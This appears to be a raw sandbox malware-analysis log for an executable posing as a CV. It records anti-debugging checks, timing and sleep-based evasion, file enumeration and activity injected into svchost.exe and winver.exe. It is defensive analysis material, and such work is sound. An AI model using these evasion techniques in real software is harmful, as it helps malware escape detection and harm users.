                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeAPI/Special instruction interceptor: Address: 19FD24C
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A7096E rdtsc 1_2_03A7096E
                Source: C:\Windows\SysWOW64\winver.exeWindow / User API: threadDelayed 2076Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeWindow / User API: threadDelayed 7896Jump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeEvaded block: after key decisiongraph_0-94100
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeEvaded block: after key decisiongraph_0-93105
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-93552
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeAPI coverage: 4.6 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\winver.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\winver.exe TID: 7928Thread sleep count: 2076 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exe TID: 7928Thread sleep time: -4152000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\winver.exe TID: 7928Thread sleep count: 7896 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exe TID: 7928Thread sleep time: -15792000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe TID: 7952Thread sleep time: -65000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe TID: 7952Thread sleep count: 36 > 30Jump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe TID: 7952Thread sleep time: -54000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe TID: 7952Thread sleep count: 35 > 30Jump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe TID: 7952Thread sleep time: -35000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\winver.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003C6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_003C6CA9
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003C60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_003C60DD
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003C63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_003C63F9
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003CEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003CEB60
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003CF56F FindFirstFileW,FindClose,0_2_003CF56F
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003CF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_003CF5FA
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003D1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003D1B2F
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003D1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003D1C8A
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003D1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003D1F94
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0301C740 FindFirstFileW,FindNextFileW,FindClose,6_2_0301C740
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0039DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0039DDC0
                Source: winver.exe, 00000006.00000002.4144237864.0000000003275000.00000004.00000020.00020000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000007.00000002.4144577938.0000000000ABF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000008.00000002.2345359398.000001DAFE66C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTT
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeAPI call chain: ExitProcess graph end nodegraph_0-92875
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A7096E rdtsc 1_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417A83 LdrLoadDll,1_2_00417A83
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003D6AAF BlockInput,0_2_003D6AAF
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00383D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00383D19
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003B3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_003B3920
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0039E01E LoadLibraryA,GetProcAddress,0_2_0039E01E
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_019FD518 mov eax, dword ptr fs:[00000030h]0_2_019FD518
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_019FD4B8 mov eax, dword ptr fs:[00000030h]0_2_019FD4B8
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_019FBE68 mov eax, dword ptr fs:[00000030h]0_2_019FBE68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2E388 mov eax, dword ptr fs:[00000030h]1_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2E388 mov eax, dword ptr fs:[00000030h]1_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2E388 mov eax, dword ptr fs:[00000030h]1_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5438F mov eax, dword ptr fs:[00000030h]1_2_03A5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5438F mov eax, dword ptr fs:[00000030h]1_2_03A5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A28397 mov eax, dword ptr fs:[00000030h]1_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A28397 mov eax, dword ptr fs:[00000030h]1_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A28397 mov eax, dword ptr fs:[00000030h]1_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]1_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]1_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]1_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]1_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]1_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]1_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]1_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]1_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A663FF mov eax, dword ptr fs:[00000030h]1_2_03A663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEC3CD mov eax, dword ptr fs:[00000030h]1_2_03AEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A383C0 mov eax, dword ptr fs:[00000030h]1_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A383C0 mov eax, dword ptr fs:[00000030h]1_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A383C0 mov eax, dword ptr fs:[00000030h]1_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A383C0 mov eax, dword ptr fs:[00000030h]1_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB63C0 mov eax, dword ptr fs:[00000030h]1_2_03AB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE3DB mov eax, dword ptr fs:[00000030h]1_2_03ADE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE3DB mov eax, dword ptr fs:[00000030h]1_2_03ADE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE3DB mov ecx, dword ptr fs:[00000030h]1_2_03ADE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE3DB mov eax, dword ptr fs:[00000030h]1_2_03ADE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD43D4 mov eax, dword ptr fs:[00000030h]1_2_03AD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD43D4 mov eax, dword ptr fs:[00000030h]1_2_03AD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A30B mov eax, dword ptr fs:[00000030h]1_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A30B mov eax, dword ptr fs:[00000030h]1_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A30B mov eax, dword ptr fs:[00000030h]1_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2C310 mov ecx, dword ptr fs:[00000030h]1_2_03A2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A50310 mov ecx, dword ptr fs:[00000030h]1_2_03A50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD437C mov eax, dword ptr fs:[00000030h]1_2_03AD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]1_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]1_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]1_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB035C mov ecx, dword ptr fs:[00000030h]1_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]1_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]1_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFA352 mov eax, dword ptr fs:[00000030h]1_2_03AFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD8350 mov ecx, dword ptr fs:[00000030h]1_2_03AD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B0634F mov eax, dword ptr fs:[00000030h]1_2_03B0634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A402A0 mov eax, dword ptr fs:[00000030h]1_2_03A402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A402A0 mov eax, dword ptr fs:[00000030h]1_2_03A402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]1_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]1_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]1_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]1_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]1_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]1_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E284 mov eax, dword ptr fs:[00000030h]1_2_03A6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E284 mov eax, dword ptr fs:[00000030h]1_2_03A6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB0283 mov eax, dword ptr fs:[00000030h]1_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB0283 mov eax, dword ptr fs:[00000030h]1_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB0283 mov eax, dword ptr fs:[00000030h]1_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A402E1 mov eax, dword ptr fs:[00000030h]1_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A402E1 mov eax, dword ptr fs:[00000030h]1_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A402E1 mov eax, dword ptr fs:[00000030h]1_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B062D6 mov eax, dword ptr fs:[00000030h]1_2_03B062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2823B mov eax, dword ptr fs:[00000030h]1_2_03A2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A34260 mov eax, dword ptr fs:[00000030h]1_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A34260 mov eax, dword ptr fs:[00000030h]1_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A34260 mov eax, dword ptr fs:[00000030h]1_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2826B mov eax, dword ptr fs:[00000030h]1_2_03A2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB8243 mov eax, dword ptr fs:[00000030h]1_2_03AB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB8243 mov ecx, dword ptr fs:[00000030h]1_2_03AB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2A250 mov eax, dword ptr fs:[00000030h]1_2_03A2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A36259 mov eax, dword ptr fs:[00000030h]1_2_03A36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEA250 mov eax, dword ptr fs:[00000030h]1_2_03AEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEA250 mov eax, dword ptr fs:[00000030h]1_2_03AEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A70185 mov eax, dword ptr fs:[00000030h]1_2_03A70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEC188 mov eax, dword ptr fs:[00000030h]1_2_03AEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEC188 mov eax, dword ptr fs:[00000030h]1_2_03AEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD4180 mov eax, dword ptr fs:[00000030h]1_2_03AD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD4180 mov eax, dword ptr fs:[00000030h]1_2_03AD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB019F mov eax, dword ptr fs:[00000030h]1_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB019F mov eax, dword ptr fs:[00000030h]1_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB019F mov eax, dword ptr fs:[00000030h]1_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB019F mov eax, dword ptr fs:[00000030h]1_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2A197 mov eax, dword ptr fs:[00000030h]1_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2A197 mov eax, dword ptr fs:[00000030h]1_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2A197 mov eax, dword ptr fs:[00000030h]1_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B061E5 mov eax, dword ptr fs:[00000030h]1_2_03B061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A601F8 mov eax, dword ptr fs:[00000030h]1_2_03A601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF61C3 mov eax, dword ptr fs:[00000030h]1_2_03AF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF61C3 mov eax, dword ptr fs:[00000030h]1_2_03AF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A60124 mov eax, dword ptr fs:[00000030h]1_2_03A60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]1_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov ecx, dword ptr fs:[00000030h]1_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]1_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]1_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov ecx, dword ptr fs:[00000030h]1_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]1_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]1_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov ecx, dword ptr fs:[00000030h]1_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]1_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE10E mov ecx, dword ptr fs:[00000030h]1_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADA118 mov ecx, dword ptr fs:[00000030h]1_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADA118 mov eax, dword ptr fs:[00000030h]1_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADA118 mov eax, dword ptr fs:[00000030h]1_2_03ADA118
